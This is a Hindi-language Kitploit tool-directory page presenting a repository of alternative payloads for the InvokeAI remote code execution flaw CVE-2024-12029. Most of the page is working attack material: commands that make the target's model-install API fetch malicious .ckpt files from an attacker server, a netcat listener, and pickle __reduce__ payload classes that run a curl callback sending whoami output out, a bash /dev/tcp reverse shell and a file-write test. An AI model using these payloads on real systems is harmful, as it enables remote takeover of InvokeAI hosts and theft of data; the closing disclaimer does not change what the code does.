Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — यह रिपॉजिटरी InvokeAI RCE भेद्यता (CVE-2024-12029) के लिए वैकल्पिक पेलोड दृष्टिकोण प्रदान करती है, जब SSH कुंजी इंजेक्शन विफल हो जाता है। पेलोड यह परीक्षण करने के लिए डिज़ाइन किए गए हैं कि क्या pickle डिसीरियलाइज़ेशन वास्तव में हो रहा है और वैकल्पिक पहुँच विधियाँ प्रदान करते हैं। | Kitploit
उपकरण/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

यह रिपॉजिटरी InvokeAI RCE भेद्यता (CVE-2024-12029) के लिए वैकल्पिक पेलोड दृष्टिकोण प्रदान करती है, जब SSH कुंजी इंजेक्शन विफल हो जाता है। पेलोड यह परीक्षण करने के लिए डिज़ाइन किए गए हैं कि क्या pickle डिसीरियलाइज़ेशन वास्तव में हो रहा है और वैकल्पिक पहुँच विधियाँ प्रदान करते हैं।

रिपॉजिटरी देखें
34 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

वैकल्पिक दृष्टिकोण: रिवर्स शेल और कॉलबैक परीक्षण

अवलोकन

इस रिपॉजिटरी में InvokeAI RCE भेद्यता (CVE-2024-12029) के लिए वैकल्पिक पेलोड दृष्टिकोण शामिल हैं, जब SSH कुंजी इंजेक्शन विफल हो जाता है। पेलोड यह परीक्षण करने के लिए डिज़ाइन किए गए हैं कि क्या pickle डिसीरियलाइज़ेशन वास्तव में हो रहा है और वैकल्पिक एक्सेस विधियाँ प्रदान करते हैं।

समस्या विवरण

जब SSH कुंजी इंजेक्शन पेलोड सफलतापूर्वक वितरित किए जाते हैं (स्टेटस 201) लेकिन SSH एक्सेस के लिए अभी भी पासवर्ड की आवश्यकता होती है, तो यह संकेत देता है कि:

  1. Pickle डिसीरियलाइज़ेशन नहीं हो रहा है
  2. कमांड ब्लॉक/सैंडबॉक्स किए जा रहे हैं
  3. निष्पादन विधि असंगत है

समाधान: वैकल्पिक पेलोड

📁 पेलोड फ़ाइलें

रिवर्स शेल पेलोड
  • payload_reverse_bash.ckpt (89 बाइट्स) - Bash रिवर्स शेल
  • payload_reverse_python.ckpt (267 बाइट्स) - Python रिवर्स शेल
  • payload_reverse_nc.ckpt (70 बाइट्स) - Netcat रिवर्स शेल

परीक्षण और सत्यापन पेलोड

  • payload_callback_test.ckpt (115 बाइट्स) - डिसीरियलाइज़ेशन सत्यापित करने के लिए HTTP कॉलबैक
  • payload_test.ckpt (90 बाइट्स) - सरल फ़ाइल निर्माण परीक्षण
  • payload_alt_exec.ckpt (223 बाइट्स) - वैकल्पिक निष्पादन विधि

SSH पेलोड (संदर्भ के लिए)

  • payload_ssh_simple.ckpt (271 बाइट्स) - Linux-संगत SSH कुंजी इंजेक्शन

🛠️ परीक्षण स्क्रिप्ट

Kali परीक्षण स्क्रिप्ट

  • kali_reverse_test.py - व्यापक परीक्षण सूट

पेलोड जनरेटर

  • reverse_shell_payload.py - रिवर्स शेल पेलोड जनरेट करें

🚀 त्वरित उपयोग

1. पेलोड सर्वर प्रारंभ करें

root@kitploit:~
python web_server.py --port 8000

2. कॉलबैक परीक्षण (पहले अनुशंसित)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. रिवर्स शेल परीक्षण

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. सरल निष्पादन परीक्षण

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 परीक्षण परिणामों की व्याख्या

✅ कॉलबैक परीक्षण सफल

  • इसका अर्थ: Pickle डिसीरियलाइज़ेशन काम कर रहा है
  • अगला कदम: रिवर्स शेल या वैकल्पिक SSH पेलोड आज़माएँ
  • जाँचें: HTTP कॉलबैक के लिए वेब सर्वर लॉग

✅ रिवर्स शेल सफल

  • इसका अर्थ: कमांड निष्पादित होते हैं और नेटवर्क एक्सेस काम करता है
  • परिणाम: netcat लिसनर के माध्यम से सीधी शेल एक्सेस
  • अगला कदम: आगे के शोषण के लिए रिवर्स शेल का उपयोग करें

✅ परीक्षण फ़ाइल निर्मित

  • इसका अर्थ: बुनियादी कमांड निष्पादन काम करता है
  • अगला कदम: वैकल्पिक SSH इंजेक्शन विधियाँ आज़माएँ
  • जाँचें: लक्ष्य पर /tmp/payload_test.txt

कॉलबैक पेलोड

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

रिवर्स शेल पेलोड

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

परीक्षण पेलोड

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 संदर्भ

  • CVE-2024-12029: InvokeAI रिमोट कोड निष्पादन
  • PyTorch असुरक्षित डिसीरियलाइज़ेशन: torch.load() भेद्यता
  • Pickle reduce: Python ऑब्जेक्ट सीरियलाइज़ेशन शोषण

⚠️ अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। किसी भी सिस्टम का परीक्षण करने से पहले उपयोगकर्ता यह सुनिश्चित करने के लिए ज़िम्मेदार हैं कि उनके पास उचित प्राधिकरण है।

टूल डाउनलोड करें